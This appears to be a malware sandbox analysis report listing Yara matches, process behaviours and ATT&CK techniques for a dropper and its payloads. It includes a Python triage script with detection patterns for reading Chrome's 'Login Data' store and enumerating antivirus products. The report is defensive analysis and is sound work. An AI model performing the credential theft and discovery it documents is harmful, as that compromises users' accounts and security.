                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040CA60 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040CA60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B2F84 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,19_2_00007FF72F6B2F84
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.30.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.30.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.30.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.30.drBinary or memory string: MsMpEng.exe
                  Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

Source: Yara match | File source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
Source: Yara match | File source: 00000039.00000002.1968824084.0000000005240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17948100733a95c58.exe PID: 4544, type: MEMORYSTR
Source: Yara match | File source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 19_2_00007FF72F668E60
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17948100733a95c58.exe PID: 4544, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
Source: Yara match | File source: 00000039.00000002.1968824084.0000000005240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Mon17948100733a95c58.exe PID: 4544, type: MEMORYSTR
Source: Yara match | File source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Code function: 18_2_00851F00 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,new | 18_2_00851F00
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Code function: 18_2_00851880 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ | 18_2_00851880
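The behaviour rows above are flat text: a source process glued to an action and a target, with a few rows (the Chrome "Login Data" path, the root\SecurityCenter2 AntiVirusProduct WMI query, the MachineGuid registry read) carrying far more signal than the hundreds of volume-information queries around them. The following is an added triage helper, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses rows in either the glued form ("...powershell.exeQueries volume information: ...") or a pipe-separated form, drops the "Jump to behavior" link residue, and applies a small rule set of my own to pull out the credential-access and discovery indicators per process. The sample rows, the rule labels and the tactic names attached to them are constructed for this example.

```python
import ntpath
import re
from dataclasses import dataclass

# Action keywords that appear in this report's behaviour rows.
ACTIONS = (
    "Queries volume information",
    "Code function",
    "Key value queried",
    "WMI Queries",
    "File source",
    "Binary or memory string",
)

# The extracted report glues the source cell to the action cell, so the source is
# matched non-greedily up to a known action keyword; an optional " | " separator and
# a trailing "Jump to behavior" link text are both tolerated.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?)\s*\|?\s*"
    r"(?P<action>" + "|".join(re.escape(a) for a in ACTIONS) + r"):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)


@dataclass(frozen=True)
class Record:
    source: str
    action: str
    detail: str

    @property
    def process(self) -> str:
        # Real sources are Windows paths; "Yara match" and "Amcache.hve.30.dr" are not.
        return ntpath.basename(self.source) if "\\" in self.source else self.source


def parse_line(line: str):
    """Return a Record for one behaviour row, or None for headings and residue."""
    m = LINE_RE.match(line)
    return Record(m["source"], m["action"], m["detail"]) if m else None


def parse_all(lines):
    return [r for r in (parse_line(l) for l in lines) if r is not None]


# Triage rules (label, tactic, pattern over the detail cell). These labels and the
# tactic mapping are this example's assumptions, not the report's own classification.
RULES = (
    ("browser credential store access", "Credential Access",
     re.compile(r"\\User Data\\[^\\]+\\Login Data", re.I)),
    ("installed AV enumeration via WMI", "Discovery",
     re.compile(r"root\\SecurityCenter2\s*:\s*AntiVirusProduct", re.I)),
    ("host fingerprint via MachineGuid", "Discovery",
     re.compile(r"\\Microsoft\\Cryptography\s+MachineGuid", re.I)),
    ("dropped file matched Yara", "Malware detection",
     re.compile(r"type:\s*DROPPED$", re.I)),
)


def triage(lines):
    """Return (process, tactic, label, detail) for every row that hits a rule."""
    findings = []
    for rec in parse_all(lines):
        for label, tactic, pattern in RULES:
            if pattern.search(rec.detail):
                findings.append((rec.process, tactic, label, rec.detail))
    return findings


def summarize(findings):
    """Collapse findings to {process: sorted labels} for a quick per-process view."""
    out = {}
    for process, _tactic, label, _detail in findings:
        out.setdefault(process, set()).add(label)
    return {p: sorted(v) for p, v in sorted(out.items())}


# Constructed sample rows shaped like the ones in this report (glued and piped forms).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\example.cat VolumeInformationJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: \Google\Chrome\User Data\Default\Login Data19_2_00007FF72F668E60",
    r"Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct",
    r"Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED",
    "barindex",
]

if __name__ == "__main__":
    for process, tactic, label, detail in triage(SAMPLE_LINES):
        print(f"{process:28} {tactic:20} {label}: {detail}")
```

The volume-information rows parse cleanly but match no rule, which is the point: on a report of this size the noise has to be parsed and then ignored so that the four rows that matter surface per process.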
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                  Execution: Windows Management Instrumentation (11); Native API (1); Exploitation for Client Execution (1); Command and Scripting Interpreter (12); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                  Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (412); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Defense Evasion: Disable or Modify Tools (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (24); Timestomp (1); DLL Side-Loading (1); Masquerading (21); Virtualization/Sandbox Evasion (251); Access Token Manipulation (1); Process Injection (412); Hidden Files and Directories (1); Rundll32 (1)
